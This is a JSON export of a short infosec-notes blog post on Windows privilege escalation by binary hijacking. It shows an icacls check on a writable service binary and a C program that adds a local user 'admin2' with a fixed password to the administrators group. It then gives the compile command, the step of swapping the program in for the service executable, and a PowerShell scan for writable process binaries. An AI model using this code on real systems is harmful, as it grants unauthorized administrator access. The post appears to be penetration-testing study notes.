{"id":4119,"date":"2024-08-31T13:30:31","date_gmt":"2024-08-31T11:30:31","guid":{"rendered":"https:\/\/andreas-klingler.de\/infosec\/?p=4119"},"modified":"2024-08-31T13:30:33","modified_gmt":"2024-08-31T11:30:33","slug":"binary-hijacking","status":"publish","type":"post","link":"https:\/\/infosec.andreas-klingler.de\/?p=4119","title":{"rendered":"Binary hijacking"},"content":{"rendered":"\n<h3 class=\"wp-block-heading\">Binary hijacking<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Check if a bina\u00adry (e.g. from a ser\u00advice) is writeable:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">PS C:\\Users\\dave&gt; icacls \"C:\\xampp\\apache\\bin\\httpd.exe\"<br>C:\\xampp\\apache\\bin\\httpd.exe BUILTIN\\Administrators:(F)<br>   NT AUTHORITY\\SYSTEM:(F)<br>   BUILTIN\\Users:(<strong>F<\/strong>)<br>   NT AUTHORITY\\Authenticated Users:(RX)<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Leg\u00adend:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>F = Full access<\/li>\n\n\n\n<li>R = Read access<\/li>\n\n\n\n<li>M = Mod\u00adi\u00adfy access<\/li>\n\n\n\n<li>R = Read-only<\/li>\n\n\n\n<li><span class=\"caps\">RX<\/span> = Read and executeable<\/li>\n\n\n\n<li>W = Write-only<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">If yes, replace it with a more use\u00adful exe\u00adcute\u00adable, like this&nbsp;one.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme data-enlighter-highlight data-enlighter-linenumbers data-enlighter-lineoffset data-enlighter-title data-enlighter-group>#include &lt;stdlib.h&gt;\n\nint main ()\n{\n  int i;  \n  i = system (\"net user admin2 password123! \/add\");\n  i = system (\"net localgroup administrators admin2 \/add\");\n  return 0;\n}\n<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Com\u00adpile this for the cor\u00adrect tar\u00adget archi\u00adtec\u00adture and replace the orig\u00adi\u00adnal&nbsp;file.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">x86_64-w64-mingw32-gcc adduser.c -o adduser.exe<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Check this with one command:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme data-enlighter-highlight data-enlighter-linenumbers data-enlighter-lineoffset data-enlighter-title data-enlighter-group>Get-Process | ForEach-Object {\n    # Get the executable path\n    $exePath = $_.Path\n\n    # If the process doesn't have an accessible executable path (e.g., system processes), skip it\n    if ($exePath) {\n        try {\n            # Get ACL for the executable\n            $acl = Get-Acl $exePath\n\n            # Get current user\n            $currentUser = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name\n\n            # Check permissions for the current user\n            $userHasWritePermission = $false\n            foreach ($accessRule in $acl.Access) {\n                if ($accessRule.IdentityReference -eq $currentUser -and\n                    $accessRule.FileSystemRights -match 'Write' -and\n                    $accessRule.AccessControlType -eq 'Allow') {\n                    $userHasWritePermission = $true\n                    break\n                }\n            }\n\n            # Output result\n            [pscustomobject]@{\n                ProcessName = $_.ProcessName\n                ExecutablePath = $exePath\n                UserHasWritePermission = $userHasWritePermission\n            }\n        } catch {\n            # Handle errors for inaccessible paths or permission issues\n            [pscustomobject]@{\n                ProcessName = $_.ProcessName\n                ExecutablePath = $exePath\n                UserHasWritePermission = 'Error: ' + $_.Exception.Message\n            }\n        }\n    }\n} | Format-Table UserHasWritePermission, ExecutablePath\n<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\"><\/h2>\n","protected":false},"excerpt":{"rendered":"<p>Bina\u00adry hijack\u00ading Check if a bina\u00adry (e.g. from a ser\u00advice) is write\u00adable: <span class=\"caps\">PS<\/span> C:\\Users\\dave&gt; ica\u00adcls \u201cC:\\xampp\\apache\\bin\\httpd.exe\u201cC:\\xampp\\apache\\bin\\httpd.exe <span class=\"caps\">BUILTIN<\/span>\\Administrators:(F) <span class=\"caps\">NT<\/span> <span class=\"caps\">AUTHORITY<\/span>\\<span class=\"caps\">SYSTEM<\/span>:(F) <span class=\"caps\">BUILTIN<\/span>\\Users:(F) <span class=\"caps\">NT<\/span> <span class=\"caps\">AUTHORITY<\/span>\\Authenticated Users:(<span class=\"caps\">RX<\/span>) Leg\u00adend: If yes, replace it with a more use\u00adful exe\u00adcute\u00adable, like this&nbsp;one. Com\u00adpile this for the cor\u00adrect tar\u00adget archi\u00adtec\u00adture and replace the orig\u00adi\u00adnal&nbsp;file. x86_64-w64-ming\u00adw32-gcc adduser.c \u2011o adduser.exe Check this with one command:<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"wp_typography_post_enhancements_disabled":false,"footnotes":""},"categories":[471],"tags":[500,117],"class_list":["post-4119","post","type-post","status-publish","format-standard","hentry","category-privesc","tag-binary-hijacking","tag-icacls"],"_links":{"self":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/4119","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4119"}],"version-history":[{"count":1,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/4119\/revisions"}],"predecessor-version":[{"id":4121,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/4119\/revisions\/4121"}],"wp:attachment":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4119"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4119"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4119"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}